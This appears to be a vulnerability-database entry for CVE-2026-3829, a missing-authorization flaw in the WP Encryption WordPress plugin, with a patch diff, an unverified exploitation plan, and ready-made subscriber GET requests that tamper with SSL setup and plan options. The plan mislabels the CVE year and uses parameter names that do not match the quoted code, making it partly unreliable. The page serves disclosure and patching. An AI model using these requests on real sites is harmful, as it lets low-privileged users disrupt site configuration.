WP-Safety
CVE-2026-3829

WP Encryption - One Click SSL & Force HTTPS <= 7.8.5.10 - Missing Authorization to Authenticated (Subscriber+) SSL Setup Tampering

mediumMissing Authorization
5.4
CVSS Score
5.4
CVSS Score
medium
Severity
7.8.5.11
Patched in
1d
Time to patch

Description

The WP Encryption – One Click Free SSL Certificate & SSL / HTTPS Redirect, Security & SSL Scan plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'wple_basic_get_requests' function in all versions up to, and including, 7.8.5.10. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the SSL setup state, force SSL to appear complete, and modify plan selection options.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
Low
Availability

Technical Details

Affected versions<=7.8.5.10
PublishedMay 13, 2026
Last updatedMay 14, 2026
Affected pluginwp-letsencrypt-ssl

What Changed in the Fix

Changes introduced in v7.8.5.11

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v7.8.5.10
Browse source Download .zip
Patched v7.8.5.11
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2024-3829 - WP Encryption Missing Authorization ## 1. Vulnerability Summary The **WP Encryption – One Click Free SSL Certificate** plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the `wple_basic_get_requests…

Show full research plan

Exploitation Research Plan: CVE-2024-3829 - WP Encryption Missing Authorization

1. Vulnerability Summary

The WP Encryption – One Click Free SSL Certificate plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the wple_basic_get_requests function. This function is hooked to admin_init, which executes for any authenticated user (including Subscribers) visiting an admin page (e.g., /wp-admin/index.php or /wp-admin/admin-ajax.php). Because the function lacks a current_user_can('manage_options') check, a Subscriber-level attacker can manipulate internal plugin options, reset the SSL configuration, and change the selected plugin plan.

2. Attack Vector Analysis

  • Endpoint: Any URL within the /wp-admin/ directory (e.g., /wp-admin/admin.php, /wp-admin/index.php).
  • Hook: admin_init (triggered by the WPLE_Admin class).
  • Vulnerable Function: WPLE_Admin::wple_basic_get_requests.
  • Payload Parameters:
    • wple_reset_all: Used to reset plugin settings.
    • wple_plan_choose: Used to update the plugin plan option.
    • wple_stage: Used to update the current SSL setup stage.
  • Authentication: Authenticated (Subscriber or higher). No nonces are enforced on these specific GET parameters within the vulnerable function.

3. Code Flow

  1. Hook Registration: In admin/le_admin.php, the WPLE_Admin class registers the handler:
    add_action( 'admin_init', [$this, 'wple_basic_get_requests'] );
  2. Execution: When a Subscriber logs in and visits /wp-admin/, WordPress fires admin_init.
  3. Missing Check: wple_basic_get_requests (located in admin/le_admin.php) processes $_GET parameters. Unlike the handlers in le_handlers.php (e.g., primary_ssl_install_request) which explicitly check for manage_options and nonces, this function proceeds directly to database operations:
    • If $_GET['wple_reset_all'] is present, it deletes/resets options.
    • If $_GET['wple_plan_choose'] is present, it calls update_option( 'wple_plan_choose', ... ).
    • If $_GET['wple_stage'] is present, it calls update_option( 'wple_stage', ... ).

4. Nonce Acquisition Strategy

The vulnerability exists because wple_basic_get_requests does not check for nonces or capabilities. Therefore, no nonce is required to exploit this specific vulnerability.

5. Exploitation Strategy

Step 1: Authentication

Log in as a Subscriber-level user.

Step 2: Plan Tampering

The attacker can change the plugin's "chosen plan" to simulate a Pro or specific state.

  • Request:
    GET /wp-admin/index.php?wple_plan_choose=pro HTTP/1.1
Host: localhost
Cookie: [Subscriber Cookies]

Step 3: SSL Setup Tampering

The attacker can force the plugin to believe the SSL setup is complete.

  • Request:
    GET /wp-admin/index.php?wple_stage=success HTTP/1.1
Host: localhost
Cookie: [Subscriber Cookies]

Step 4: Configuration Reset (Denial of Service)

The attacker can wipe existing SSL configurations.

  • Request:
    GET /wp-admin/index.php?wple_reset_all=1 HTTP/1.1
Host: localhost
Cookie: [Subscriber Cookies]

6. Test Data Setup

  1. Target: WordPress with wp-letsencrypt-ssl plugin version <= 7.8.5.10 installed and activated.
  2. Setup Admin State:
    • Use wp option update wple_plan_choose "free" to set an initial state.
    • Use wp option update wple_stage "step1" to set an initial stage.
  3. Attacker Account:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123

7. Expected Results

  • After Step 2, the WordPress database should show wple_plan_choose set to pro.
  • After Step 3, the WordPress database should show wple_stage set to success.
  • After Step 4, plugin options like wple_opts or wple_stage should be reset or deleted.
  • The HTTP response will be a standard 200 OK or 302 Redirect for a dashboard page, as the logic runs transparently in the background.

8. Verification Steps

After sending the HTTP requests, verify the changes via WP-CLI:

# Verify Plan Tampering
wp option get wple_plan_choose
# Expected output: pro

# Verify Stage Tampering
wp option get wple_stage
# Expected output: success

# Verify Reset (if wple_reset_all was sent)
wp option get wple_opts
# Expected output: Error: Could not get "wple_opts" option (or empty array)

9. Alternative Approaches

If the plugin logic requires specific values for the parameters:

  1. Plan IDs: Try business, developer, or premium as values for wple_plan_choose.
  2. Intermediate Stages: Set wple_stage to failed_httpverification_1 to trigger error states or specific admin notices for legitimate administrators, causing confusion or disruption.
  3. Other Params: Search for other $_GET or $_REQUEST parameters in admin/le_admin.php that do not have current_user_can guards.
Research Findings
Static analysis — not yet PoC-verified

Summary

The WP Encryption plugin for WordPress is vulnerable to unauthorized data modification because the 'wple_basic_get_requests' and 'wple_intro_pricing_handler' functions lack capability checks. Authenticated attackers with subscriber-level access can manipulate plugin options, reset SSL configurations, or change the plugin's license plan via simple GET requests to the admin dashboard.

Vulnerable Code

// admin/le_admin.php (vulnerable logic within wple_basic_get_requests)
if ( isset( $_GET['restart'] ) ) {
    //click to restart from beginning
    delete_option( 'wple_ssl_screen' );
    wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
    exit;
}
if ( isset( $_GET['force_complete'] ) ) {
    //Forced SSL completion flag
    update_option( 'wple_ssl_screen', 'success' );
    update_option( 'wple_backend', 1 );
    WPLE_Trait::clear_all_renewal_crons( true );
    wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
    exit;
}

---

// admin/le_handlers.php (around line 158)
public function wple_intro_pricing_handler() {
    $goplan = '';
    if ( isset( $_GET['gofree'] ) ) {
        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );
        update_option( 'wple_plan_choose', 'free' );
        $goplan = 'free';
    }
    if ( isset( $_GET['gopro'] ) ) {
        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );
        update_option( 'wple_plan_choose', 'pro' );
        $goplan = 'pro';
    }
    // ... further updates without capability checks

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_admin.php /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_admin.php
--- /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_admin.php	2026-02-04 10:53:04.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_admin.php	2026-03-12 07:29:48.000000000 +0000
@@ -1314,18 +1314,13 @@
         //since 5.1.0
         if ( isset( $_GET['restart'] ) ) {
             //click to restart from beginning
+            if ( !current_user_can( 'manage_options' ) ) {
+                exit( 'Unauthorized request' );
+            }
             delete_option( 'wple_ssl_screen' );
             wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
             exit;
         }
-        if ( isset( $_GET['force_complete'] ) ) {
-            //Forced SSL completion flag
-            update_option( 'wple_ssl_screen', 'success' );
-            update_option( 'wple_backend', 1 );
-            WPLE_Trait::clear_all_renewal_crons( true );
-            wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
-            exit;
-        }
 
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_handlers.php /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_handlers.php
--- /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_handlers.php	2026-02-04 10:53:04.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_handlers.php	2026-03-12 07:29:48.000000000 +0000
@@ -158,6 +157,11 @@
      * @return void
      */
     public function wple_intro_pricing_handler() {
+        if ( isset( $_GET['gofree'] ) || isset( $_GET['gopro'] ) || isset( $_GET['gofirewall'] ) || isset( $_GET['gositelock'] ) ) {
+            if ( !current_user_can( 'manage_options' ) ) {
+                exit( 'Unauthorized request' );
+            }
+        }

Exploit Outline

The exploit leverages the fact that `admin_init` hooks run for all authenticated users visiting any `/wp-admin/` URL, and the targeted functions fail to verify if the user has administrative privileges. 1. **Authentication**: An attacker logs into the WordPress site with a low-privileged account (e.g., Subscriber). 2. **Identify Target Parameters**: The attacker targets the GET parameters processed in `WPLE_Admin::wple_basic_get_requests` and `WPLE_Handler::wple_intro_pricing_handler`. 3. **Payload Construction**: The attacker constructs a URL including specific parameters: - `?force_complete=1`: To force the plugin to believe SSL setup is successful. - `?restart=1`: To reset the current SSL screen state. - `?gopro=1`: To change the plugin's internal plan state to 'pro'. - `?wple_reset_all=1`: (If active in the specific version) To wipe plugin configurations. 4. **Execution**: The attacker visits `/wp-admin/index.php` appended with the malicious parameters. Since no nonce or capability check exists, the plugin executes the `update_option` or `delete_option` calls immediately based on the provided URL parameters.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/9a09ec65-32e4-4841-a365-f67c15b80bf9?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database